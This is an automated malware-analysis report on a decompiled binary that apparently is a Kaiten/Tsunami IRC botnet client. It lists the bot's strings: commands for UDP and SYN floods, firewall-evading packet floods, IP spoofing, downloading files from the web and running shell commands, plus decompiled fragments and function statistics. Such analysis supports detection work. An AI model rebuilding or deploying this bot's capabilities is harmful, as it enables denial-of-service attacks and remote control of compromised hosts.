=============================================================================
========	BINARY ID :16b95df50baa1b781eb71ac39dac7f587301dff9==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :299
SUPSCPECTED LINES COUNT :94
SUPSCPECTED STRINGS COUNT (DISTINCT) :23
SUPSCPECTED STRINGS WEIGHT :85
SUSPECT STRING SCORE : [85 / 150] 56%
USER AGENTS STRINGS COUNT :1
STATIC IPs STRINGS COUNT :0
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
NOTICE %s :Unable to comply.\n
/usr/dict/words
NOTICE %s :GET <host> <save as>\n
NOTICE %s :Unable to create socket.\n
http://
NOTICE %s :Unable to resolve address.\n
NOTICE %s :Unable to connect to http.\n
GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n
NOTICE %s :Receiving file.\n
NOTICE %s :Saved as %s\n
NOTICE %s :Spoofs: %d.%d.%d.%d\n
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n
NOTICE %s :Kaiten wa goraku\n
NOTICE %s :NICK <nick>\n
NOTICE %s :Nick cannot be larger than 9 characters.\n
NOTICE %s :DISABLE <pass>\n
NOTICE %s :Current status is: %s.\n
NOTICE %s :Already disabled.\n
NOTICE %s :Password too long! > 254\n
NOTICE %s :Disable sucessful.\n
NOTICE %s :ENABLE <pass>\n
NOTICE %s :Already enabled.\n
NOTICE %s :Wrong password\n
NOTICE %s :Password correct.\n
NOTICE %s :Removed all spoofs\n
NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n
NOTICE %s :Unable to resolve %s\n
NOTICE %s :UDP <target> <port> <secs>\n
NOTICE %s :Packeting %s.\n
NOTICE %s :PAN <target> <port> <secs>\n
NOTICE %s :Panning %s.\n
NOTICE %s :TSUNAMI <target> <secs>\n
NOTICE %s :Tsunami heading for %s.\n
NOTICE %s :UNKNOWN <target> <secs>\n
NOTICE %s :Unknowning %s.\n
NOTICE %s :MOVE <server>\n
NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls\n
NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers\n
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder\n
NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder\n
NOTICE %s :NICK <nick>                                      = Changes the nick of the client\n
NOTICE %s :SERVER <server>                                  = Changes servers\n
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing\n
NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet\n
NOTICE %s :DISABLE                                          = Disables all packeting from this client\n
NOTICE %s :ENABLE                                           = Enables all packeting from this client\n
NOTICE %s :KILL                                             = Kills the client\n
NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd\n
NOTICE %s :VERSION                                          = Requests version of client\n
NOTICE %s :KILLALL                                          = Kills all current packeting\n
NOTICE %s :HELP                                             = Displays this\n
NOTICE %s :IRC <command>                                    = Sends this command to the server\n
NOTICE %s :SH <command>                                     = Executes a command\n
NOTICE %s :Killing pid %d.\n
GETSPOOFS
SPOOFS
KILL
KILLALL
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s\n
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n
PRIVMSG
PING
NICK %s\nUSER %s localhost localhost :%s\n
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
/bin/sh
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
/etc/hosts
/etc/config/hosts
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
NOTICE %s :Spoofs: %d.%d.%d.%d\n
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 49489
+++TOTAL FUNCTIONS 			:218
+++LINES PER FUNCTION RATIO 	: 227.01376146789
+++SUSPECTED LINES COUNT 	: 282
+++SUSPECTED LINES RATIO 	: 0.569823597163006
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 49489
+++WHILE (TRUE) LINES			: 12129
+++WHILE (TRUE) LINES RATION		:24.5084766311706%
+++WHILE (TRUE) LOOPS COUNT		: 108
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
    int32_t v128 = function_cd94((int32_t)"/usr/dict/words", (int32_t)&v127); // 0x86f8
            function_10594((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
        function_10594((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                    function_10594((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                function_10594((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    int32_t result2 = function_10e94("/dev/null", a2); // 0x10868
    int32_t v125 = function_cd94((int32_t)"/etc/resolv.conf", (int32_t)&v124); // 0x12e94
        int32_t v128 = function_cd94((int32_t)"/etc/config/resolv.conf", (int32_t)&v124); // 0x12ea8
    int32_t result = function_cd94((int32_t)"/etc/hosts", (int32_t)&v123); // 0x141c8
        return function_cd94((int32_t)"/etc/config/hosts", (int32_t)&v123);
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
        result = function_8374(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d\n");

        result = function_8374(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_11e00                                    |2   |2398    |35            |1045        |
----------------------------------------------------------------------------------------------
function_11660                                    |5   |3552    |28            |3233        |
----------------------------------------------------------------------------------------------
function_dfb8                                     |1   |934     |19            |784         |
----------------------------------------------------------------------------------------------
function_8df4                                     |4   |421     |15            |254         |
----------------------------------------------------------------------------------------------
function_c094                                     |2   |366     |10            |241         |
----------------------------------------------------------------------------------------------
function_141f0                                    |0   |617     |9             |270         |
----------------------------------------------------------------------------------------------
function_b90c                                     |3   |327     |8             |201         |
----------------------------------------------------------------------------------------------
function_12e4c                                    |1   |393     |7             |227         |
----------------------------------------------------------------------------------------------
function_122a0                                    |4   |289     |6             |132         |
----------------------------------------------------------------------------------------------
function_123b4                                    |4   |269     |6             |122         |
----------------------------------------------------------------------------------------------
function_12640                                    |6   |1081    |6             |819         |
----------------------------------------------------------------------------------------------
function_148a4                                    |0   |488     |4             |212         |
----------------------------------------------------------------------------------------------
function_13c70                                    |4   |456     |4             |306         |
----------------------------------------------------------------------------------------------
function_149b4                                    |0   |541     |4             |228         |
----------------------------------------------------------------------------------------------
function_d70c                                     |11  |882     |4             |730         |
----------------------------------------------------------------------------------------------
function_c864                                     |2   |520     |4             |350         |
----------------------------------------------------------------------------------------------
function_c930                                     |2   |585     |4             |376         |
----------------------------------------------------------------------------------------------
function_ee60                                     |3   |232     |3             |81          |
----------------------------------------------------------------------------------------------
function_138fc                                    |3   |338     |3             |134         |
----------------------------------------------------------------------------------------------
function_ce94                                     |1   |204     |3             |57          |
----------------------------------------------------------------------------------------------
function_f8dc                                     |3   |136     |3             |0           |
----------------------------------------------------------------------------------------------
function_11080                                    |5   |315     |3             |65          |
----------------------------------------------------------------------------------------------
function_10354                                    |1   |296     |3             |109         |
----------------------------------------------------------------------------------------------
function_ddd0                                     |0   |302     |3             |116         |
----------------------------------------------------------------------------------------------
function_ef18                                     |1   |315     |3             |107         |
----------------------------------------------------------------------------------------------
function_f79c                                     |6   |136     |3             |0           |
----------------------------------------------------------------------------------------------
function_bd88                                     |0   |239     |3             |111         |
----------------------------------------------------------------------------------------------
function_9a0c                                     |4   |199     |3             |40          |
----------------------------------------------------------------------------------------------
function_8868                                     |2   |363     |3             |20          |
----------------------------------------------------------------------------------------------
function_11174                                    |3   |212     |2             |77          |
----------------------------------------------------------------------------------------------
function_137e0                                    |1   |171     |2             |35          |
----------------------------------------------------------------------------------------------
function_a110                                     |4   |205     |2             |39          |
----------------------------------------------------------------------------------------------
function_ec20                                     |2   |252     |2             |74          |
----------------------------------------------------------------------------------------------
function_9d1c                                     |4   |197     |2             |34          |
----------------------------------------------------------------------------------------------
function_12514                                    |0   |168     |2             |33          |
----------------------------------------------------------------------------------------------
function_f2a8                                     |1   |274     |2             |145         |
----------------------------------------------------------------------------------------------
function_10f84                                    |4   |167     |2             |0           |
----------------------------------------------------------------------------------------------
function_145dc                                    |2   |217     |2             |88          |
----------------------------------------------------------------------------------------------
function_141bc                                    |0   |132     |2             |0           |
----------------------------------------------------------------------------------------------
function_1478c                                    |0   |230     |2             |83          |
----------------------------------------------------------------------------------------------
function_a6b8                                     |4   |203     |2             |41          |
----------------------------------------------------------------------------------------------
function_11510                                    |5   |237     |2             |49          |
----------------------------------------------------------------------------------------------
function_e7a0                                     |1   |275     |2             |69          |
----------------------------------------------------------------------------------------------
function_9560                                     |4   |137     |2             |0           |
----------------------------------------------------------------------------------------------
function_12554                                    |2   |221     |2             |87          |
----------------------------------------------------------------------------------------------
function_10c10                                    |1   |139     |2             |0           |
----------------------------------------------------------------------------------------------
function_f00c                                     |0   |254     |2             |70          |
----------------------------------------------------------------------------------------------
function_b84c                                     |3   |128     |1             |0           |
----------------------------------------------------------------------------------------------
function_f7c8                                     |10  |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_cb18                                     |2   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_dd00                                     |1   |186     |1             |36          |
----------------------------------------------------------------------------------------------
function_d554                                     |0   |168     |1             |13          |
----------------------------------------------------------------------------------------------
function_f878                                     |6   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_108d8                                    |7   |364     |1             |22          |
----------------------------------------------------------------------------------------------
function_fc14                                     |3   |206     |1             |68          |
----------------------------------------------------------------------------------------------
function_ed3c                                     |3   |295     |1             |102         |
----------------------------------------------------------------------------------------------
function_13168                                    |4   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_e660                                     |1   |195     |1             |33          |
----------------------------------------------------------------------------------------------
function_13640                                    |2   |150     |1             |19          |
----------------------------------------------------------------------------------------------
function_f8ac                                     |5   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_85f8                                     |1   |146     |1             |19          |
----------------------------------------------------------------------------------------------
function_ca18                                     |1   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_146e4                                    |1   |218     |1             |59          |
----------------------------------------------------------------------------------------------
function_f84c                                     |4   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_13660                                    |2   |173     |1             |10          |
----------------------------------------------------------------------------------------------
function_f7f4                                     |4   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_fb4c                                     |2   |186     |1             |41          |
----------------------------------------------------------------------------------------------
function_101c0                                    |2   |187     |1             |35          |
----------------------------------------------------------------------------------------------
function_df6c                                     |0   |149     |1             |19          |
----------------------------------------------------------------------------------------------
function_f820                                     |2   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_e984                                     |3   |245     |1             |74          |
----------------------------------------------------------------------------------------------
function_fd08                                     |0   |196     |1             |4           |
----------------------------------------------------------------------------------------------
function_10e94                                    |2   |141     |1             |0           |
----------------------------------------------------------------------------------------------
function_13718                                    |4   |211     |1             |24          |
----------------------------------------------------------------------------------------------
function_13b0c                                    |3   |176     |1             |44          |
----------------------------------------------------------------------------------------------
function_f0f4                                     |2   |171     |1             |40          |
----------------------------------------------------------------------------------------------
function_13830                                    |2   |205     |1             |53          |
----------------------------------------------------------------------------------------------
function_10fd8                                    |0   |141     |1             |0           |
----------------------------------------------------------------------------------------------
function_d63c                                     |3   |152     |1             |17          |
----------------------------------------------------------------------------------------------
function_14858                                    |0   |155     |1             |16          |
----------------------------------------------------------------------------------------------
function_ca70                                     |0   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_ca44                                     |1   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_bc88                                     |3   |213     |1             |87          |
----------------------------------------------------------------------------------------------
function_ca9c                                     |0   |136     |1             |0           |
----------------------------------------------------------------------------------------------
function_107cc                                    |1   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_14b28                                    |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_10e3c                                    |0   |137     |0             |0           |
----------------------------------------------------------------------------------------------
function_14518                                    |6   |144     |0             |0           |
----------------------------------------------------------------------------------------------
function_12288                                    |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_10d0c                                    |1   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_fff4                                     |1   |129     |0             |0           |
----------------------------------------------------------------------------------------------
function_cde4                                     |0   |150     |0             |0           |
----------------------------------------------------------------------------------------------
function_cf94                                     |2   |308     |0             |0           |
----------------------------------------------------------------------------------------------
function_11010                                    |3   |152     |0             |0           |
----------------------------------------------------------------------------------------------
function_10f2c                                    |1   |173     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |2   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_13294                                    |8   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_13194                                    |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_8374                                     |2   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_d60c                                     |0   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_f1cc                                     |0   |138     |0             |0           |
----------------------------------------------------------------------------------------------
function_11230                                    |3   |212     |0             |0           |
----------------------------------------------------------------------------------------------
function_eb20                                     |2   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_f3c0                                     |1   |134     |0             |0           |
----------------------------------------------------------------------------------------------
function_12e18                                    |3   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_10130                                    |2   |157     |0             |0           |
----------------------------------------------------------------------------------------------
function_13524                                    |1   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_ec10                                     |0   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_f294                                     |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_cba8                                     |2   |138     |0             |0           |
----------------------------------------------------------------------------------------------
function_10280                                    |4   |207     |0             |0           |
----------------------------------------------------------------------------------------------
function_10ef0                                    |1   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_cba0                                     |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_14070                                    |7   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_9c5c                                     |2   |143     |0             |0           |
----------------------------------------------------------------------------------------------
function_f170                                     |1   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_ed20                                     |2   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_f1a0                                     |5   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_e594                                     |3   |173     |0             |0           |
----------------------------------------------------------------------------------------------
function_14af4                                    |1   |141     |0             |0           |
----------------------------------------------------------------------------------------------
function_eb54                                     |4   |197     |0             |0           |
----------------------------------------------------------------------------------------------
function_b8d4                                     |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_d688                                     |4   |195     |0             |0           |
----------------------------------------------------------------------------------------------
function_13120                                    |7   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_ec00                                     |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_f908                                     |1   |219     |0             |0           |
----------------------------------------------------------------------------------------------
function_1239c                                    |4   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_11368                                    |2   |274     |0             |0           |
----------------------------------------------------------------------------------------------
function_8124                                     |2   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_13ed0                                    |5   |138     |0             |0           |
----------------------------------------------------------------------------------------------
function_cda0                                     |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_8188                                     |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_8c48                                     |2   |144     |0             |0           |
----------------------------------------------------------------------------------------------
function_83d8                                     |1   |154     |0             |0           |
----------------------------------------------------------------------------------------------
function_1146c                                    |0   |169     |0             |0           |
----------------------------------------------------------------------------------------------
function_ca14                                     |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_f3e4                                     |1   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_1113c                                    |6   |135     |0             |0           |
----------------------------------------------------------------------------------------------
function_d4a4                                     |2   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_d544                                     |0   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_ecc0                                     |0   |201     |0             |0           |
----------------------------------------------------------------------------------------------
function_114dc                                    |4   |142     |0             |0           |
----------------------------------------------------------------------------------------------
function_f238                                     |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_cb44                                     |5   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_10db8                                    |0   |137     |0             |0           |
----------------------------------------------------------------------------------------------
function_10d38                                    |1   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_13278                                    |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_11004                                    |0   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_10838                                    |0   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_14b30                                    |0   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_8130                                     |0   |131     |0             |0           |
----------------------------------------------------------------------------------------------
function_e500                                     |3   |140     |0             |0           |
----------------------------------------------------------------------------------------------
function_1360c                                    |3   |140     |0             |0           |
----------------------------------------------------------------------------------------------
function_fa5c                                     |1   |189     |0             |0           |
----------------------------------------------------------------------------------------------
function_10d60                                    |2   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_f25c                                     |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_bc40                                     |3   |129     |0             |0           |
----------------------------------------------------------------------------------------------
function_145a8                                    |1   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_dd98                                     |2   |132     |0             |0           |
----------------------------------------------------------------------------------------------
function_cac8                                     |3   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_10c48                                    |2   |144     |0             |0           |
----------------------------------------------------------------------------------------------
function_d4d4                                     |0   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_8094                                     |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_1087c                                    |1   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_1457c                                    |1   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_10f00                                    |1   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_13218                                    |1   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_f1ac                                     |1   |135     |0             |0           |
----------------------------------------------------------------------------------------------
function_81cc                                     |2   |190     |0             |0           |
----------------------------------------------------------------------------------------------
function_cdb0                                     |3   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_fbe0                                     |0   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_970c                                     |4   |145     |0             |0           |
----------------------------------------------------------------------------------------------
function_96d0                                     |4   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_10840                                    |0   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_d1dc                                     |4   |999     |0             |0           |
----------------------------------------------------------------------------------------------
function_ea1c                                     |3   |386     |0             |0           |
----------------------------------------------------------------------------------------------
function_10cbc                                    |0   |137     |0             |0           |
----------------------------------------------------------------------------------------------
function_cb74                                     |1   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_13550                                    |0   |185     |0             |0           |
----------------------------------------------------------------------------------------------
function_13458                                    |2   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_140e0                                    |4   |147     |0             |0           |
----------------------------------------------------------------------------------------------
function_10b24                                    |3   |163     |0             |0           |
----------------------------------------------------------------------------------------------
function_10de4                                    |0   |137     |0             |0           |
----------------------------------------------------------------------------------------------
function_eff8                                     |3   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_cbd4                                     |1   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_133fc                                    |3   |165     |0             |0           |
----------------------------------------------------------------------------------------------
function_131d0                                    |2   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_8548                                     |0   |145     |0             |0           |
----------------------------------------------------------------------------------------------
function_10594                                    |5   |147     |0             |0           |
----------------------------------------------------------------------------------------------
function_10844                                    |2   |142     |0             |0           |
----------------------------------------------------------------------------------------------
function_124a0                                    |0   |150     |0             |0           |
----------------------------------------------------------------------------------------------
function_80b0                                     |0   |147     |0             |0           |
----------------------------------------------------------------------------------------------
function_11cc8                                    |1   |285     |0             |0           |
----------------------------------------------------------------------------------------------
function_140cc                                    |2   |135     |0             |0           |
----------------------------------------------------------------------------------------------
function_10500                                    |1   |137     |0             |0           |
----------------------------------------------------------------------------------------------
function_cd94                                     |2   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_11060                                    |0   |130     |0             |0           |
----------------------------------------------------------------------------------------------
function_10e10                                    |1   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_10d8c                                    |0   |144     |0             |0           |
----------------------------------------------------------------------------------------------
function_13fb8                                    |2   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_e47c                                     |1   |142     |0             |0           |
----------------------------------------------------------------------------------------------
function_131f4                                    |2   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_1323c                                    |1   |134     |0             |0           |
----------------------------------------------------------------------------------------------
function_12290                                    |4   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_97b0                                     |4   |158     |0             |0           |
----------------------------------------------------------------------------------------------
function_132c0                                    |0   |205     |0             |0           |
----------------------------------------------------------------------------------------------
function_10628                                    |1   |226     |0             |0           |
----------------------------------------------------------------------------------------------
function_cc08                                     |0   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_fc00                                     |0   |133     |0             |0           |
----------------------------------------------------------------------------------------------
function_8cc4                                     |2   |167     |0             |0           |
----------------------------------------------------------------------------------------------
function_98f0                                     |4   |156     |0             |0           |
----------------------------------------------------------------------------------------------
function_f270                                     |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_f428                                     |6   |497     |0             |0           |
----------------------------------------------------------------------------------------------
function_131ac                                    |2   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_fe50                                     |0   |131     |0             |0           |
----------------------------------------------------------------------------------------------
function_cc14                                     |1   |171     |0             |0           |
----------------------------------------------------------------------------------------------
function_10e68                                    |3   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_8688                                     |0   |173     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_11e00 ===================
++++++++ FUNCTION START 35362
++++++++ FUNCTION END 37760
++++++++ FUNCTION LENGTH 2398
                            while (true) {
                        while (true) {
                        while (true) {
                        while (true) {
                            while (true) {
                            while (true) {
                            while (true) {
                        while (true) {
                            while (true) {
                                    while (true) {
                        while (true) {
                            while (true) {
                            while (true) {
                                        while (true) {
                    case -1: {
                            while (true) {
                    case -2: {
                            while (true) {
                            while (true) {
                                        while (true) {
                while (true) {
                            while (true) {
                                while (true) {
                            while (true) {
                                while (true) {
                                while (true) {
                                        while (true) {
                        case -1: {
                                while (true) {
                        case -2: {
                                while (true) {
                                while (true) {
                                        while (true) {
                    while (true) {
                            while (true) {
=================FUNCTION : function_11660 ===================
++++++++ FUNCTION START 31519
++++++++ FUNCTION END 35071
++++++++ FUNCTION LENGTH 3552
            while (true) {
            while (true) {
                                                                while (true) {
                                                            while (true) {
                                                        while (true) {
                                                        while (true) {
                                                    while (true) {
                                                while (true) {
                                                            while (true) {
                                                        while (true) {
                                                    while (true) {
                                                    while (true) {
                                                while (true) {
                                            while (true) {
                                                            while (true) {
                                                        while (true) {
                                                    while (true) {
                                                    while (true) {
                                                while (true) {
                                            while (true) {
                                                    while (true) {
                                                while (true) {
                                            while (true) {
                                            while (true) {
                                        while (true) {
                                    while (true) {
                                                                while (true) {
                            while (true) {
=================FUNCTION : function_dfb8 ===================
++++++++ FUNCTION START 14290
++++++++ FUNCTION END 15224
++++++++ FUNCTION LENGTH 934
        while (true) {
                while (true) {
                    while (true) {
                                                                while (true) {
                                                                        while (true) {
                                                                                    while (true) {
                                                                                while (true) {
                                                        while (true) {
                                                                while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                            while (true) {
                                                    while (true) {
                                                                while (true) {
                                                            while (true) {
                                    while (true) {
                                        while (true) {
                                            while (true) {
    while (true) {
=================FUNCTION : function_8df4 ===================
++++++++ FUNCTION START 2755
++++++++ FUNCTION END 3176
++++++++ FUNCTION LENGTH 421
            function_8374(*v126, (int32_t)"NOTICE %s :GET <host> <save as>\n");
            function_8374(*v126, (int32_t)"NOTICE %s :Unable to create socket.\n");
        if (function_ed3c((char *)v129, (int32_t)"http://", 7) == 0) {
        while (true) {
            if (function_f7f4(v127, (struct sockaddr *)&v136, 16) != 0) {
                function_8374(*v126, (int32_t)"NOTICE %s :Unable to connect to http.\n");
            function_8374(v127, (int32_t)"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
            while (true) {
                    while (true) {
                                while (true) {
                                while (true) {
                                    while (true) {
                                    while (true) {
                        while (true) {
                while (true) {
=================FUNCTION : function_c094 ===================
++++++++ FUNCTION START 6058
++++++++ FUNCTION END 6424
++++++++ FUNCTION LENGTH 366
    while (true) {
            while (true) {
                function_8374(v135, (int32_t)"NICK %s\nUSER %s localhost localhost :%s\n");
                while (true) {
                    while (true) {
                        while (true) {
            while (true) {
                    while (true) {
                while (true) {
                while (true) {
=================FUNCTION : function_141f0 ===================
++++++++ FUNCTION START 46130
++++++++ FUNCTION END 46747
++++++++ FUNCTION LENGTH 617
            while (true) {
                                    while (true) {
                                while (true) {
    while (true) {
                while (true) {
                        while (true) {
                                    while (true) {
                            while (true) {
                        while (true) {
=================FUNCTION : function_b90c ===================
++++++++ FUNCTION START 5138
++++++++ FUNCTION END 5465
++++++++ FUNCTION LENGTH 327
    while (true) {
        while (true) {
        while (true) {
                        while (true) {
                    while (true) {
                        while (true) {
                        while (true) {
                                result2 = function_8374(a1, (int32_t)"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n");
=================FUNCTION : function_12e4c ===================
++++++++ FUNCTION START 40485
++++++++ FUNCTION END 40878
++++++++ FUNCTION LENGTH 393
    while (true) {
            while (true) {
                        while (true) {
                                        while (true) {
                                            while (true) {
                                while (true) {
                                while (true) {
=================FUNCTION : function_122a0 ===================
++++++++ FUNCTION START 38023
++++++++ FUNCTION END 38312
++++++++ FUNCTION LENGTH 289
        while (true) {
                while (true) {
                while (true) {
            while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_123b4 ===================
++++++++ FUNCTION START 38445
++++++++ FUNCTION END 38714
++++++++ FUNCTION LENGTH 269
        while (true) {
                while (true) {
                while (true) {
            while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_12640 ===================
++++++++ FUNCTION START 39265
++++++++ FUNCTION END 40346
++++++++ FUNCTION LENGTH 1081
                        while (true) {
                            while (true) {
                                while (true) {
                                                if (function_f7f4(v159, (struct sockaddr *)&v132, 28) < 0) {
                                                                            while (true) {
                                                                                    while (true) {
=================FUNCTION : function_148a4 ===================
++++++++ FUNCTION START 48007
++++++++ FUNCTION END 48495
++++++++ FUNCTION LENGTH 488
    while (true) {
                                while (true) {
                                    while (true) {
                while (true) {
=================FUNCTION : function_13c70 ===================
++++++++ FUNCTION START 44839
++++++++ FUNCTION END 45295
++++++++ FUNCTION LENGTH 456
        while (true) {
                while (true) {
                            while (true) {
                while (true) {
